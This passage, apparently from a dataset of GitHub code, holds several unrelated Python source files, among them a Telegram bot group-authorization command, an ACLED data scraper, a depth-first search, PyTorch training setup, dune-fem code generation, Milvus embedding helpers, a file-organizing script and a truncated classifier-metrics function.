continue\")\n\t\t","repo_name":"rangamani54/Automation-with-Python","sub_path":"drorgrem.py","file_name":"drorgrem.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7843040843","text":"from pyrogram import Client, filters\n@Client.on_message(filters.command ('add'))\nasync def cmd_add(Client,message):\n user_id = str(message.from_user.id)\n CEO = \"1900986195\"\n GROUP = open(\"plugins/group.txt\").read().splitlines()\n if user_id != CEO :\n resp = \"𝗥𝗲𝗾𝘂𝗶𝗿𝗲 𝗢𝘄𝗻𝗲𝗿 𝗣𝗿𝗶𝘃𝗶𝗹𝗮𝗴𝗲𝘀 ⚠️\"\n msg1 = await message.reply_text(resp,message.id)\n else:\n chat_add = message.text[len('/add '):]\n if len(chat_add) == 0:\n chat_id = str(message.chat.id)\n else:\n chat_id = message.text[len('/add '):]\n groupid = chat_id\n if groupid in GROUP:\n resp = f\"\"\"\n𝗧𝗵𝗶𝘀 𝗴𝗿𝗼𝘂𝗽 ({groupid}) 𝗶𝘀 𝗮𝗹𝗿𝗲𝗮𝗱𝘆 𝗮𝘂𝘁𝗵𝗼𝗿𝗶𝘇𝗲𝗱 ⚠️.\n \"\"\"\n await message.reply_text(resp,message.id)\n else:\n with open(\"plugins/group.txt\", \"a\") as f:\n f.write(f\"{groupid}\\n\")\n resp = f\"\"\"\n𝗧𝗵𝗶𝘀 𝗴𝗿𝗼𝘂𝗽 ({groupid}) 𝗶𝘀 𝗻𝗼𝘄 𝗮𝘂𝘁𝗵𝗼𝗿𝗶𝘇𝗲𝗱 ✅.\n \"\"\"\n await message.reply_text(resp,message.id)\n \n ","repo_name":"TeamArmx/botwwwww","sub_path":"plugins/admin/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41921685196","text":"import logging\nfrom itertools import chain\n\nfrom hdx.location.country import Country\nfrom hdx.scraper.base_scraper import BaseScraper\nfrom hdx.scraper.utilities.sources import Sources\nfrom hdx.utilities.dateparse import default_date, parse_date\nfrom hdx.utilities.downloader import Download\n\nlogger = logging.getLogger(__name__)\n\nhxltags = {\n \"event_date\": \"#date+occurred\",\n \"event_type\": \"#event+type\",\n \"sub_event_type\": \"#event+type+sub\",\n \"actor1\": \"#group+name+first\",\n \"actor2\": \"#group+name+second\",\n \"admin1\": \"#adm1+name\",\n \"admin2\": \"#adm2+name\",\n \"admin3\": \"#adm3+name\",\n \"adm2_pcode\": \"#adm2+code\",\n \"location\": \"#loc+name\",\n \"latitude\": \"#geo+lat\",\n \"longitude\": \"#geo+lon\",\n \"notes\": \"#description\",\n \"fatalities\": \"#affected+killed\",\n}\n\n\nclass ACLED(BaseScraper):\n def __init__(\n self,\n datasetinfo,\n today,\n countryiso3s,\n outputs,\n admintwo,\n ):\n # ACLED outputs to its own tab \"fatalities\" so there are no headers\n super().__init__(\n \"acled\",\n datasetinfo,\n dict(),\n source_configuration=Sources.create_source_configuration(\n adminlevel=admintwo\n ),\n )\n self.start_date = parse_date(datasetinfo[\"start_date\"])\n self.today = today\n self.countryiso3s = countryiso3s\n self.outputs = outputs\n self.admintwo = admintwo\n\n def run(self):\n years = range(self.start_date.year, self.today.year + 1)\n iterables = list()\n reader = self.get_reader()\n for year in years:\n for countryiso3 in self.countryiso3s:\n countrycode = Country.get_m49_from_iso3(countryiso3)\n url = self.datasetinfo[\"url\"] % (countrycode, year)\n path = reader.download_file(url)\n downloader = Download()\n headers, iterator = downloader.get_tabular_rows(path, dict_form=True)\n iterables.append(iterator)\n latest_date = default_date\n rows = [list(hxltags.keys()), list(hxltags.values())]\n for inrow in chain.from_iterable(iterables):\n date = parse_date(inrow[\"event_date\"])\n if date < self.start_date:\n continue\n if date > latest_date:\n latest_date = date\n iso3 = Country.get_iso3_from_m49(int(inrow[\"iso\"]))\n admlevel = self.admintwo.get_admin_level(iso3)\n admname = inrow[f\"admin{admlevel}\"]\n pcode = None\n if admname:\n pcode, _ = self.admintwo.get_pcode(iso3, admname)\n inrow[\"adm2_pcode\"] = pcode\n row = list()\n for header in hxltags:\n row.append(inrow[header])\n rows.append(row)\n tabname = \"fatalities\"\n for output in self.outputs.values():\n output.update_tab(tabname, rows)\n self.datasetinfo[\"source_date\"] = latest_date\n\n def add_sources(self):\n self.add_hxltag_source(\n \"#date+latest+acled+regional\", datasetinfo=self.datasetinfo\n )\n for countryiso3 in self.countryiso3s:\n self.add_hxltag_source(\n f\"#date+latest+acled+{countryiso3.lower()}\",\n datasetinfo=self.datasetinfo,\n )\n","repo_name":"OCHA-DAP/hdx-scraper-hornafrica-viz","sub_path":"scrapers/acled.py","file_name":"acled.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9260245954","text":"\r\nfrom mostra_caminho import MostraCaminho\r\n\r\n\r\nclass DepthFirst:\r\n\r\n def __init__(self, grafo, start, goalNode):\r\n self.mostraCaminho = MostraCaminho()\r\n self.caminho = {}\r\n self.visitados = []\r\n self.listaAdj = []\r\n self.grafo = grafo\r\n self.start = start\r\n self.goalNode = goalNode\r\n\r\n def iniciarBusca(self):\r\n self.depth_first()\r\n self.clear()\r\n\r\n def depth_first(self):\r\n\r\n if self.busca(self.start):\r\n self.mostraCaminho.mostra_caminho(self.start, self.goalNode, self.caminho)\r\n else:\r\n print('Não encontrado')\r\n\r\n def busca(self, start):\r\n\r\n self.visitados.append(start)\r\n self.listaAdj.append(start)\r\n cidadeAtual = self.listaAdj.pop(0)\r\n\r\n if cidadeAtual.__eq__(self.goalNode):\r\n return True\r\n\r\n for filho in self.grafo[cidadeAtual]:\r\n if not self.visitados.__contains__(filho):\r\n self.caminho[filho] = cidadeAtual\r\n if self.busca(filho):\r\n return True\r\n return False\r\n\r\n def clear(self):\r\n self.caminho.clear()\r\n self.visitados.clear()\r\n self.listaAdj.clear()\r\n\r\n\r\n\"\"\"from create_grafo import Grafo\r\ncreate = Grafo()\r\nDepthFirst(create.criaGrafo(), \"Arad\", \"Bucharest\").iniciarBusca()\"\"\"","repo_name":"mariotinelli/UENP","sub_path":"Inteligencia_Artificial/trabalho_inteligencia_artificial/depth_first_search.py","file_name":"depth_first_search.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42918432417","text":"#!/usr/bin/env python3\n\"\"\"\nThe main entry point to the training procedure. All necessary objects are\ninitialized here and the training procedure is started.\n\"\"\"\n\nimport argparse\nimport collections\n\nimport numpy as np\nimport torch\nimport torch.nn.modules.loss as torch_loss\n\nimport data_loader.data_loaders as module_data\nimport logger.logger as module_logger\nimport model.loss as module_loss\nimport model.metric as module_metric\nimport model.model as module_arch\nimport trainer.scheduler as module_scheduler\nimport trainer.trainer as module_trainer\nimport dev_mapper.device_mapper as module_mapper\nfrom lib.config_parser import ConfigParser\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\nnp.random.seed(SEED)\n# The following is also required for exact reproducibility. However they can\n# have an impact on performance and are hence disabled by default.\n# torch.backends.cudnn.deterministic = True\n# torch.backends.cudnn.benchmark = False\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n logger = module_logger.get_logger('main')\n\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str, help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str, help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str, help='indices of GPUs to enable (default: all)')\n\n # custom cli options to modify configuration from default values given in json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float, target='optimizer;args;lr'),\n CustomArgs(['--bs', '--batch_size'], type=int, target='data_loader;args;batch_size')\n ]\n config = ConfigParser.from_args(args, options)\n\n # setup device mapper\n device_mapper = config.init_obj('device_mapper', module_mapper)\n\n # setup data_loader instances\n data_loader = config.init_obj('train_data_loader', module_data)\n valid_data_loader = config.init_obj('val_data_loader', module_data)\n\n # build model architecture, then print to console\n model = config.init_obj('arch', module_arch)\n model = device_mapper.parallelize_model(model)\n logger.info(model)\n\n # get function handles of loss and metrics\n # criterion = getattr(module_loss, config['loss'])\n # metrics = [getattr(module_metric, met) for met in config['metrics']]\n\n # get loss and metric modules\n loss = config.init_obj('loss', [module_loss, torch_loss])\n metrics = config.init_list_of_objs('metrics', module_metric)\n\n # Move loss and metrics parameters to correct GPU\n loss = device_mapper.map_modules(loss)\n metrics = device_mapper.map_modules(metrics)\n\n # build optimizer, learning rate scheduler. delete every lines containing lr_scheduler for disabling scheduler\n trainable_params = filter(lambda p: p.requires_grad, model.parameters())\n optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n\n lr_scheduler = config.init_obj('lr_scheduler', [torch.optim.lr_scheduler, module_scheduler], optimizer)\n\n trainer = config.init_obj('trainer', module_trainer, config, device_mapper, model, loss, metrics, optimizer,\n data_loader, valid_data_loader, lr_scheduler)\n\n trainer.train()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lming24/kaggle-melanoma","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5464464837","text":"from __future__ import division, print_function, unicode_literals\n\nfrom ufl import Form, Coefficient, TrialFunction, TestFunction, replace\nfrom ufl.core.expr import Expr\nfrom ufl.algorithms.analysis import extract_arguments_and_coefficients\nfrom ufl.equation import Equation\n\nfrom dune.common.utility import isString\n\nfrom dune.source.cplusplus import Include, NameSpace, TypeAlias, IfStatement\nfrom dune.source.cplusplus import SourceWriter\nfrom dune.source.fem import fieldTensorType\nfrom dune.ufl import GridFunction, DirichletBC\nfrom dune.ufl.gatherderivatives import gatherDerivatives\nfrom dune.ufl.codegen import uflSignature\n\nfrom .ufl import _compileUFL\nfrom .model import Integrands\n\n\ndef init(integrands, source, *args, **kwargs):\n coefficients = kwargs.pop('coefficients', dict())\n coefficientNames = integrands._coefficientNames\n if len(args) == 1 and isinstance(args[0], dict):\n coefficients.update(args[0])\n args = []\n else:\n args = list(a for a in args if not isinstance(a,DirichletBC) and not a is None)\n dirichletBCs = list(a for a in args if isinstance(a,DirichletBC))\n if len(args) > len(coefficientNames) + len(dirichletBCs):\n raise ValueError('Too many coefficients passed.')\n\n args += [None] * (len(coefficientNames) - len(args))\n\n for name, value in kwargs.items():\n try:\n i = coefficientNames[name]\n except KeyError:\n raise ValueError('No such coefficent: ' + name + '.')\n\n if args[i] is not None:\n raise ValueError('Coefficient already given as positional argument: ' + name + '.')\n args[i] = value\n\n for key, value in coefficients.items():\n if isinstance(key, Coefficient):\n try:\n i = integrands._renumbering[key]\n except AttributeError:\n raise ValueError('Cannot map UFL coefficients, because model was not generated from UFL form.')\n except KeyError:\n raise ValueError('No such coefficient: ' + str(key) + '.')\n elif isString(key):\n try:\n i = coefficientNames[key]\n except KeyError:\n raise ValueError('No such coefficent: ' + key + '.')\n else:\n raise ValueError('Expecting keys of coefficient map to be strings or intances of ufl.Coefficient.')\n if args[i] is not None:\n raise ValueError('Coefficient already given as positional or keyword argument: ' + str(key) + '.')\n args[i] = value\n\n if hasattr(integrands, '_renumbering'):\n for c, i in integrands._renumbering.items():\n if isinstance(c, GridFunction):\n if args[i] is None:\n args[i] = c.gf\n\n if any(arg is None for arg in args):\n missing = [name for name, i in coefficientNames.items() if args[i] is None]\n raise ValueError('Missing coefficients: ' + ', '.join(missing) + '.')\n\n integrands.base.__init__(integrands, *args, **kwargs)\n\n for c in source.constantList:\n if hasattr(c,\"name\") and hasattr(c,\"value\"):\n assert hasattr(integrands,c.name)\n getattr(type(integrands), c.name).fset(integrands, c.value)\n\n\ndef setConstant(integrands, index, value):\n try:\n index = integrands._renumbering[index]\n except KeyError:\n pass\n integrands._setConstant(index, value)\n\n\nclass Source(object):\n version = \"v1_3\"\n def __init__(self, integrands, grid, modelIncludes, form, *args,\n tempVars=True, virtualize=True):\n gridType = grid.cppTypeName\n gridIncludes = grid.cppIncludes\n self.gridType = gridType\n self.gridIncludes = gridIncludes\n if modelIncludes is not None:\n self.modelIncludes = modelIncludes\n else:\n self.modelIncludes = [\"dune/fempy/py/integrands.hh\"]\n self.integrands = integrands\n self.tempVars = tempVars\n self.virtualize = virtualize\n self.args = args\n self.form = form\n\n def signature(self):\n return uflSignature(self.form,\n *self.integrands._coefficients,\n *self.integrands.coefficientCppTypes,\n *self.integrands._constantNames,\n *[a for a in self.args if isinstance(a,DirichletBC)],\n *self.integrands.baseSignature\n )+Source.version\n\n def name(self):\n from dune.common.hashit import hashIt\n if self.virtualize:\n return self.integrands.baseName + '_' + self.signature() + '_' + hashIt(self.gridType)\n else:\n return self.integrands.baseName + '_nv_' + self.signature() + '_' + hashIt(self.gridType)\n\n def valueTuples(self):\n if isinstance(self.form, Form):\n derivatives = gatherDerivatives(self.form)\n return ['std::tuple< ' + ', '.join(fieldTensorType(v.ufl_shape) for v in d) + ' >' for d in derivatives]\n else:\n return [self.form.rangeValueTuple, self.form.domainValueTuple]\n\n # actual code generation (the generator converts this object to a string)\n def __str__(self):\n if isinstance(self.form, Form):\n # actual code generation\n integrands = _compileUFL(self.integrands, self.form, *self.args, tempVars=self.tempVars)\n else:\n integrands = self.integrands\n\n code = [Include('config.h')]\n code += [Include(i) for i in self.gridIncludes]\n\n code += integrands.includes()\n code.append(Include(\"dune/python/pybind11/pybind11.h\"))\n code.append(Include(\"dune/python/pybind11/extensions.h\"))\n code.append(Include(\"dune/fempy/py/grid/gridpart.hh\"))\n\n if integrands._coefficients:\n if self.virtualize:\n code.append(Include(\"dune/fempy/function/virtualizedgridfunction.hh\"))\n code.append(Include('dune/fempy/function/simplegridfunction.hh'))\n code.append(Include('dune/fem/misc/gridfunctionview.hh'))\n else:\n for c in integrands._coefficients:\n for i in c.cppIncludes:\n code.append(Include(i))\n for i in self.modelIncludes:\n code.append(Include(i))\n\n nameSpace = NameSpace('Integrands_' + self.signature())\n # add integrands class\n nameSpace.append(integrands.code(self.name(),integrands.targs))\n code.append(nameSpace)\n\n writer = SourceWriter()\n writer.emit(\"#ifndef GuardIntegrands_\" + self.signature())\n writer.emit(\"#define GuardIntegrands_\" + self.signature())\n writer.emit(\"#define USING_DUNE_PYTHON 1\")\n writer.emit(code)\n\n name = self.name()\n coefficients = integrands.coefficientCppTypes\n integrandsName = nameSpace.name + '::Integrands< ' + ', '.join(['GridPart'] + coefficients) + ' >'\n\n register = []\n register.append('auto cls = Dune::Python::insertClass(module,\"Integrands\",Dune::Python::GenerateTypeName(\"'+integrandsName+'\"), Dune::Python::IncludeFiles({\"python/dune/generated/'+name+'.cc\"})).first;')\n register.append('Dune::FemPy::registerIntegrands< Integrands >( module, cls );')\n if coefficients:\n coefficientNames = integrands.coefficientNames\n initArgs = ', '.join('const ' + t + ' &' + n for t, n in zip(coefficients, coefficientNames))\n keepAlive = ', '.join('pybind11::keep_alive< 1, ' + str(i+2) + ' >()' for i in range(len(coefficientNames)))\n register.append('cls.def( pybind11::init( [] ( ' + initArgs + ' ) { return new Integrands( ' + ', '.join(coefficientNames) + ' ); } ), ' + keepAlive + ' );')\n else:\n register.append('cls.def( pybind11::init( [] () { return new Integrands(); } ) );')\n for t, n, ns in zip(integrands.constantTypes, integrands.constantNames, integrands.constantShortNames):\n te = \"Integrands::\" + t\n register.append('cls.def_property( \"' + ns + '\", [] ( Integrands &self ) -> ' + te + ' { return self.' + n + '(); }, [] ( Integrands &self, const ' + te + ' &v ) { self.' + n + '() = v; } );')\n register.append('cls.def_property_readonly( \"virtualized\", [] ( Integrands& ) -> bool { return '+str(self.virtualize).lower()+';});')\n hasDirichletBC = 'true' if integrands.hasDirichletBoundary else 'false'\n register.append('cls.def_property_readonly( \"hasDirichletBoundary\", [] ( Integrands& ) -> bool { return '+hasDirichletBC+';});')\n\n writer.openPythonModule(name)\n writer.emit(TypeAlias('GridPart', 'typename Dune::FemPy::GridPart< ' + self.gridType + ' >'))\n writer.emit(TypeAlias('Integrands', integrandsName))\n writer.emit(IfStatement('Integrands::gridPartValid',register,constexpr=True))\n writer.closePythonModule(name)\n writer.emit(\"#endif // GuardIntegrands_\" + self.signature())\n\n source = writer.writer.getvalue()\n writer.close()\n return source\n\n\n# Load the actual module - the code generation from the ufl form is done\n# when the 'Source' class is converted to a string i.e. in Source.__str__\ndef load(grid, form, *args, renumbering=None, tempVars=True,\n virtualize=True, modelPatch=[None,None],\n includes=None):\n\n if not isinstance(modelPatch,list) and not isinstance(modelPatch,tuple):\n modelPatch = [modelPatch,None]\n\n if isinstance(form, Equation):\n form = form.lhs - form.rhs\n\n if isinstance(form, Integrands):\n integrands = form\n else:\n if len(form.arguments()) < 2:\n raise ValueError(\"Integrands model requires form with at least two arguments.\")\n\n phi_, u_ = form.arguments()\n\n if phi_.ufl_function_space().scalar:\n phi = TestFunction(phi_.ufl_function_space().toVectorSpace())\n form = replace(form,{phi_:phi[0]})\n else:\n phi = phi_\n if u_.ufl_function_space().scalar:\n u = TrialFunction(u_.ufl_function_space().toVectorSpace())\n form = replace(form,{u_:u[0]})\n else:\n u = u_\n\n if not isinstance(form, Form):\n raise ValueError(\"ufl.Form or ufl.Equation expected.\")\n\n _, coeff_ = extract_arguments_and_coefficients(form)\n coeff_ = set(coeff_)\n\n # added for dirichlet treatment same as conservationlaw model\n dirichletBCs = [arg for arg in args if isinstance(arg, DirichletBC)]\n # remove the dirichletBCs\n arg = [arg for arg in args if not isinstance(arg, DirichletBC)]\n for dBC in dirichletBCs:\n _, coeff__ = extract_arguments_and_coefficients(dBC.ufl_value)\n coeff_ |= set(coeff__)\n\n coeff_ = sorted(list(coeff_), key=lambda c: c.count())\n coeff = {c : c.toVectorCoefficient()[0] for c in coeff_ if len(c.ufl_shape) == 0 and not c.is_cellwise_constant()}\n\n form = replace(form,coeff)\n uflExpr = [form]\n for dBC in dirichletBCs:\n arg.append(dBC.replace(coeff))\n uflExpr += [dBC.ufl_value] # arg[-1].ufl_value]\n\n if modelPatch[1] is not None:\n uflExpr += modelPatch[1]\n\n derivatives = gatherDerivatives(form, [phi, u])\n\n derivatives_phi = derivatives[0]\n derivatives_u = derivatives[1]\n\n integrands = Integrands(u,\n (d.ufl_shape for d in derivatives_u), (d.ufl_shape for d in derivatives_phi),\n uflExpr,virtualize)\n\n if modelPatch[0] is not None:\n modelPatch[0](integrands)\n\n # set up the source class\n source = Source(integrands, grid, includes, form, *args,\n tempVars=tempVars,virtualize=virtualize)\n\n # ufl coefficient and constants only have numbers which depend on the\n # order in whch they were generated - we need to keep track of how\n # these numbers are translated into the tuple numbering in the\n # generated C++ code\n if isinstance(form, Form):\n coefficients = set(integrands.coefficientList+integrands.constantList)\n numCoefficients = len(coefficients)\n if renumbering is None:\n renumbering = dict()\n renumbering.update((c, i) for i, c in enumerate(sorted((c for c in coefficients if not c.is_cellwise_constant()), key=lambda c: c.count())))\n renumbering.update((c, i) for i, c in enumerate(c for c in coefficients if c.is_cellwise_constant()))\n coefficientNames = integrands._coefficientNames # ['coefficient' + str(i) if n is None else n for i, n in enumerate(getattr(c, 'name', None) for c in coefficients if not c.is_cellwise_constant())]\n else:\n coefficientNames = form.coefficientNames\n\n # call code generator\n from dune.generator import builder\n module = builder.load(source.name(), source, \"Integrands\")\n\n assert hasattr(module,\"Integrands\"),\\\n \"GridViews of coefficients need to be compatible with the grid view of the ufl model\"\n\n rangeValueTuple, domainValueTuple = source.valueTuples()\n setattr(module.Integrands, \"_domainValueType\", domainValueTuple)\n setattr(module.Integrands, \"_rangeValueType\", rangeValueTuple)\n # redirect the __init__ method to take care of setting coefficient and renumbering\n class Model(module.Integrands):\n def __init__(self, *args, **kwargs):\n self.base = module.Integrands\n init(self,integrands,*args,**kwargs)\n for c in integrands.constantList:\n c.registerModel(self)\n\n setattr(Model, '_coefficientNames', {n: i for i, n in enumerate(coefficientNames)})\n if renumbering is not None:\n setattr(Model, '_renumbering', renumbering)\n Model._setConstant = module.Integrands.__dict__['setConstant']\n setattr(Model, 'setConstant', setConstant)\n\n return Model\n","repo_name":"dune-mirrors/dune-fem","sub_path":"python/dune/models/integrands/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":13812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70589346115","text":"import pymilvus\nfrom app import database\n\n\ndef create_language_model(model_name: str, num_dims: int):\n \"\"\"Create a new language model in milvus by adding a record to the meta\n collection, and createing a new collection for the language model\"\"\"\n meta_collection = database.create_or_get_model_metadata()\n meta_collection.insert(\n [\n model_name,\n num_dims,\n ]\n )\n model_collection = __create_language_model_colection__(model_name, num_dims)\n return model_collection\n\n\ndef get_language_model(model_name: str):\n return pymilvus.Collection(f\"model.{model_name}\", using=database.MILVUS_ALIAS)\n\n\ndef delete_language_model(model_name: str):\n \"\"\"Delete a language model from milvus by removing the record from the meta\n collection, and deleting the collection for the language model\"\"\"\n meta_collection = database.create_or_get_model_metadata()\n meta_collection.delete_records([model_name])\n model_collection = pymilvus.Collection(\n name=f\"model.{model_name}\", using=database.MILVUS_ALIAS\n )\n model_collection.drop()\n return model_collection\n\n\ndef __create_language_model_colection__(model_name: str, num_dims: int):\n \"\"\"Create a new collection for a language model\"\"\"\n model_name = f\"model.{model_name}\"\n if pymilvus.utility.has_collection(model_name, using=database.MILVUS_ALIAS):\n raise ValueError(f\"Collection {model_name} already exists\")\n word_field = pymilvus.FieldSchema(\n name=\"word\",\n dtype=pymilvus.DataType.VARCHAR,\n max_length=128,\n )\n embedding_field = pymilvus.FieldSchema(\n name=\"embedding\",\n dtype=pymilvus.DataType.FLOAT_VECTOR,\n dim=num_dims,\n )\n schema = pymilvus.CollectionSchema(\n fields=[word_field, embedding_field],\n description=f\"Language model {model_name} d={num_dims}\",\n )\n collection = pymilvus.Collection(\n name=model_name,\n schema=schema,\n using=database.MILVUS_ALIAS,\n )\n return collection\n\n\ndef insert_embedding(model_name: str, word: str, embedding: list[float]):\n \"\"\"Insert a word embedding into a language model\"\"\"\n model_collection = get_language_model(model_name)\n model_collection.insert(\n [\n word,\n embedding,\n ]\n )\n return model_collection\n\n\ndef remove_embeddings(model_name: str, words: str):\n \"\"\"Remove a word embedding from a language model\"\"\"\n model_collection = get_language_model(model_name)\n words = \",\".join(words)\n expr = f\"word in ({words})\"\n model_collection.delete(expr)\n return model_collection\n","repo_name":"BenDavidAaron/readr","sub_path":"api/app/language_models.py","file_name":"language_models.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26324812279","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 27 10:39 2020\n\n@author: fdbfvuie\n\"\"\"\n\nimport math\n\nn = int(input())\nfor i in range(n):\n a = int(input())\n b = int(input())\n sum = 0\n\n for j in range(math.ceil(math.sqrt(a)), math.floor(math.sqrt(b)) + 1, 1):\n sum += j ** 2\n\n print(\"Case \" + str(i+1) + \": \" + str(sum))","repo_name":"fjfhfjfjgishbrk/AE401-Python","sub_path":"zerojudge/a059.py","file_name":"a059.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13842550540","text":"from Dent import *\n#\nb_stitch = Button(control, text=\"stitch and normalize\", activeforeground=\"blue\")\nb_norms = Label(control, text=\"normalize takes about 10s\", foreground=\"blue\")\nb_norms.grid(row=1, column=2)\nb_stitch['command'] = lambda text=b_norms: stitch(b_norm = text)\nb_stitch.grid(row=1, column=1)\n\n# update button\nt_norm = Label(control, text=\"crop take less than 1s\", foreground=\"blue\")\nt_norm.grid(row=2, column=2)\nb_norm = Button(control, text=\"crop\", activeforeground=\"blue\")\nb_norm['command'] = lambda text=t_norm: raw.crop(t_norm = text)\nb_norm.grid(row=2, column=1)\n\n# update button\n# slider\nvar = DoubleVar()\nslider = Scale(control, variable=var, orient=HORIZONTAL, to=10, from_=200)\nslider.set(110)\nslider.grid(row=3, column=0)\n# button\nt_extract = Label(control, text=\"Extracting takes 2s\", foreground=\"blue\")\nt_extract.grid(row=3, column=2)\nb_extract = Button(control, text=\"extract\", activeforeground=\"blue\")\nb_extract['command'] = lambda text=t_extract, slider=slider: raw.extract(t_extract = text, param= var.get())\nb_extract.grid(row=3, column=1)\n\n# update button\nt_shift = Label(control, text=\"Shifting takes 4s\", foreground=\"blue\")\nt_shift.grid(row=4, column=2)\nb_shift = Button(control, text=\"shift\", activeforeground=\"blue\")\nb_shift['command'] = lambda text=t_shift: raw.Shift(t_shift=text)\nb_shift.grid(row=4, column=1)\n\n# update button\n# slider\nvar2 = DoubleVar()\nslider2 = Scale(control, variable=var2, orient=HORIZONTAL, to=5, from_=30)\nslider2.set(10)\nslider2.grid(row=5, column=0)\n\nt_cluster = Label(control, text=\"Clustering takes 7s\", foreground=\"blue\")\nt_cluster.grid(row=5, column=2)\nb_cluster = Button(control, text=\"cluster\", activeforeground=\"blue\")\nb_cluster['command'] = lambda text=t_cluster, slider=slider2: raw.Cluster(t_cluster= text, param= var2.get())\nb_cluster.grid(row=5, column=1)\n\n# update button\nt_label = Label(control, text=\"detecting takes 1s\", foreground=\"blue\")\nt_label.grid(row=6, column=2)\nb_detect = Button(control, text=\"detect\", activeforeground=\"blue\")\nb_detect['command'] = lambda text=t_label: raw.Detection(t_detect=text, result=result)\nb_detect.grid(row=6, column=1)\n\nroot.mainloop()","repo_name":"doublehidenblade/Vehicle-hail-dent-detection","sub_path":"Simpler.py","file_name":"Simpler.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17800371748","text":"from win10toast import ToastNotifier\nimport os,time\n\n# os.chdir(\"C:/Users/usert/Desktop/test\")\npath=os.getcwd()\ncurrent_folder=os.path.split(path)[-1] #gets working folder name to target\nfile_list=os.listdir(path)\nfor file in file_list:\n if file.endswith('.py' or '.pyw'):continue\n if os.path.isfile(file):\n src=os.path.join(path,file)\n folder_name=f\"{(os.path.splitext(file)[1])[1:]}_files\" #gets the extension of file\n try:\n if not os.path.exists(folder_name): #check if dir present\n os.mkdir(folder_name) #makes new dir\n except FileExistsError:pass\n\n dst=os.path.join(path,folder_name,file)\n try:\n os.rename(src,dst)\n except FileExistsError: #renames file name as 'copy_of_file'\n dst=os.path.join(path,folder_name,'copy_of_'+file)\n os.rename(src,dst)\n\n#Windows notification, autocollapse after 3 sec\ntoaster=ToastNotifier()\ntoaster.show_toast(f\"From {current_folder.capitalize()} Folder\",\"folder organized\",duration=3)\n","repo_name":"JemitDave/Automation_scripts","sub_path":"declutter_code/script_for_clutterfree_folder_4.py","file_name":"script_for_clutterfree_folder_4.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32386259220","text":"import pandas as pd\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.impute import SimpleImputer\n\nfrom sklearn.metrics import f1_score\n\nfrom imblearn.combine import SMOTETomek \n\n# ------------------------- print results ------------------------- #\n\ndef print_classification_results(y_insample, y_outsample):\n \"\"\" Takes in a dataframe with column-separated model predictions, \n Calculates accuracy and recall of each model (loops columns) for in- and out-sample data,\n Appends all results to running dataframe, \n Returns dataframe. \"\"\"\n # create empty results dataframe\n running_df = pd.DataFrame(columns=['Model','InSample_Accuracy','OutSample_Accuracy',\n 'InSample_Recall','OutSample_Recall',\n 'InSample_Precision','OutSample_Precision',\n 'InSample_F1_Score','OutSample_F1_Score'])\n # loop through each model\n for model in y_insample.columns[1:]:\n # calculate model accuracy\n in_accuracy = (y_insample[model] == y_insample.in_actuals).mean()\n out_accuracy = (y_outsample[model] == y_outsample.out_actuals).mean()\n # determine sums of true positives and false negatives for recall and precision calculations\n # true positive: model correctly predicts 1 when actual is 1\n # false negative: model wrongly predicts 0 when actual is 1\n in_true_positive = ((y_insample[model] == 1) & (y_insample['in_actuals'] == 1)).sum()\n in_false_positive = ((y_insample[model] == 1) & (y_insample['in_actuals'] == 0)).sum()\n in_false_negative = ((y_insample[model] == 0) & (y_insample['in_actuals'] == 1)).sum()\n out_true_positive = ((y_outsample[model] == 1) & (y_outsample['out_actuals'] == 1)).sum()\n out_false_positive = ((y_outsample[model] == 1) & (y_outsample['out_actuals'] == 0)).sum()\n out_false_negative = ((y_outsample[model] == 0) & (y_outsample['out_actuals'] == 1)).sum()\n # calculate recall and precision scores\n in_recall = in_true_positive / (in_true_positive + in_false_negative)\n out_recall = out_true_positive / (out_true_positive + out_false_negative)\n in_precision = in_true_positive / (in_true_positive + in_false_positive)\n out_precision = out_true_positive / (out_true_positive + out_false_positive)\n # calculate f1 score\n in_f1_score = (2 * in_precision * in_recall) / (in_precision + in_recall)\n out_f1_score = (2 * out_precision * out_recall) / (out_precision + out_recall)\n # add results to new row in dataframe\n running_df = running_df.append({'Model':model,\n 'InSample_Accuracy':round(in_accuracy, 4), \n 